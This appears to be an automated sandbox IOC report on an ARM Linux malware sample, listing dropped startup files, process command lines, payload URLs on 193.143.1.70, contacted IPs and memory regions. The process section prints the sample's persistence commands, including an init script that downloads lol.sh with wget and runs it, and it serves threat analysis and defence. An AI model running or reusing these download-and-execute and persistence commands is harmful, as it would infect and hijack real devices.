IOC Report
arm7.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
arm7.nn.elf
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
initial sample
malicious
/etc/init.d/arm7.nn.elf
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/system
POSIX shell script, ASCII text executable
dropped
malicious
/etc/profile
ASCII text
dropped
malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.GXEQs8 (deleted)
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
/tmp/arm7.nn.elf
/tmp/arm7.nn.elf
/tmp/arm7.nn.elf
-
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/system
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm7.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm7.nn.elf'\n /tmp/arm7.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm7.nn.elf'\n killall arm7.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm7.nn.elf"
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "chmod +x /etc/init.d/arm7.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/arm7.nn.elf
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/arm7.nn.elf
-
/bin/sh
/bin/sh -c "ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf
/tmp/arm7.nn.elf
-
/tmp/arm7.nn.elf
-
/tmp/arm7.nn.elf
-
/tmp/arm7.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
There are 41 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
unknown
http://193.143.1.70/curl.sh
unknown
http://193.143.1.70/lol.sh
unknown
http://193.143.1.70/
unknown

IPs

IP
Domain
Country
Malicious
108.218.207.151
unknown
United States
44.41.0.148
unknown
United States
222.97.59.78
unknown
Korea Republic of
186.140.29.220
unknown
Argentina
49.164.163.139
unknown
Korea Republic of
83.93.226.228
unknown
Denmark
141.134.222.109
unknown
Belgium
113.155.105.170
unknown
Japan
59.165.85.60
unknown
India
184.14.85.135
unknown
United States
73.57.31.40
unknown
United States
189.14.240.153
unknown
Brazil
29.55.170.110
unknown
United States
35.6.89.70
unknown
United States
90.169.71.146
unknown
Spain
215.110.139.87
unknown
United States
88.227.142.200
unknown
Turkey
78.69.71.77
unknown
Sweden
44.116.143.183
unknown
United States
163.125.198.12
unknown
China
149.18.139.110
unknown
United States
75.140.161.71
unknown
United States
148.176.149.205
unknown
United Kingdom
64.56.157.203
unknown
Canada
210.195.66.18
unknown
Malaysia
146.187.189.126
unknown
United States
169.91.187.169
unknown
United States
12.124.237.61
unknown
United States
45.154.146.255
unknown
Poland
86.107.89.70
unknown
Iran (ISLAMIC Republic Of)
31.232.159.158
unknown
Germany
150.98.116.172
unknown
Japan
177.172.95.39
unknown
Brazil
29.7.196.37
unknown
United States
39.160.134.110
unknown
China
166.74.224.28
unknown
United States
72.128.228.16
unknown
United States
121.51.22.126
unknown
China
18.53.18.246
unknown
United States
16.74.158.242
unknown
United States
189.46.170.0
unknown
Brazil
45.201.230.233
unknown
Seychelles
176.196.182.56
unknown
Russian Federation
49.167.178.230
unknown
Korea Republic of
79.174.130.81
unknown
Belgium
83.90.31.246
unknown
Denmark
12.189.29.20
unknown
United States
9.15.165.84
unknown
United States
30.83.90.10
unknown
United States
143.78.213.0
unknown
United States
97.80.59.174
unknown
United States
33.219.71.153
unknown
United States
36.211.231.93
unknown
China
111.243.14.173
unknown
Taiwan; Republic of China (ROC)
18.44.62.71
unknown
United States
176.99.225.31
unknown
Russian Federation
62.137.199.53
unknown
United Kingdom
45.182.36.35
unknown
Peru
35.74.17.116
unknown
United States
157.171.213.243
unknown
Sweden
120.163.221.201
unknown
Indonesia
173.56.204.138
unknown
United States
31.45.136.185
unknown
Croatia (LOCAL Name: Hrvatska)
197.38.183.244
unknown
Egypt
124.34.119.210
unknown
Japan
102.49.136.243
unknown
Morocco
46.111.15.136
unknown
Russian Federation
174.100.61.50
unknown
United States
189.252.227.94
unknown
Mexico
125.44.4.180
unknown
China
116.116.247.112
unknown
China
222.174.101.115
unknown
China
5.4.88.82
unknown
Germany
67.69.177.81
unknown
Canada
191.105.49.234
unknown
Colombia
193.143.1.70
unknown
unknown
186.124.159.227
unknown
Argentina
134.49.197.113
unknown
United States
119.149.21.179
unknown
Korea Republic of
64.88.94.246
unknown
United States
132.157.107.251
unknown
Peru
76.68.94.133
unknown
Canada
43.124.232.40
unknown
Japan
146.114.152.212
unknown
United States
141.14.92.147
unknown
Germany
158.237.109.21
unknown
United States
34.86.59.93
unknown
United States
208.164.10.187
unknown
United States
83.153.84.47
unknown
France
123.1.173.144
unknown
Hong Kong
103.19.149.151
unknown
India
86.53.156.155
unknown
United Kingdom
93.250.227.66
unknown
Germany
189.198.194.140
unknown
Mexico
45.102.167.242
unknown
Egypt
139.226.193.112
unknown
China
59.30.171.138
unknown
Korea Republic of
88.40.94.232
unknown
Italy
217.121.159.164
unknown
Netherlands
65.33.134.243
unknown
United States
There are 90 hidden IPs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7f5730037000
page execute read
malicious
7f5730037000
page execute read
malicious
7f573003f000
page read and write
7f5838c9b000
page read and write
7f583905e000
page read and write
562bb6e3f000
page read and write
7f58391f0000
page read and write
7f58391f0000
page read and write
562bb6be5000
page execute read
7f58391ab000
page read and write
562bb6be5000
page execute read
7f5838e7d000
page read and write
7f58388a1000
page read and write
7f5730049000
page read and write
562bb9c7c000
page read and write
7ffca5c4b000
page execute read
562bb6e36000
page read and write
7f5838b0c000
page read and write
7f58384ad000
page read and write
7f5837ca5000
page read and write
562bb8e3d000
page execute and read and write
7f5837ca5000
page read and write
562bb6e36000
page read and write
7f5838e7d000
page read and write
562bb6e3f000
page read and write
7f58384ad000
page read and write
7f583853f000
page read and write
7ffca5bfd000
page read and write
7f5839187000
page read and write
7f582ffff000
page read and write
7f5730044000
page read and write
7f583853f000
page read and write
7f5730044000
page read and write
7f5838b2f000
page read and write
7f583905e000
page read and write
562bb8e3d000
page execute and read and write
7ffca5bfd000
page read and write
7f5839187000
page read and write
7f5830021000
page read and write
7ffca5c4b000
page execute read
7f5838b0c000
page read and write
7f5838c9b000
page read and write
562bb9c7c000
page read and write
7f582ffff000
page read and write
562bb8e54000
page read and write
562bb8e54000
page read and write
7f5830021000
page read and write
7f5838b2f000
page read and write
7f58388a1000
page read and write
7f58391ab000
page read and write
7f573003f000
page read and write
There are 41 hidden memdumps, click here to show them.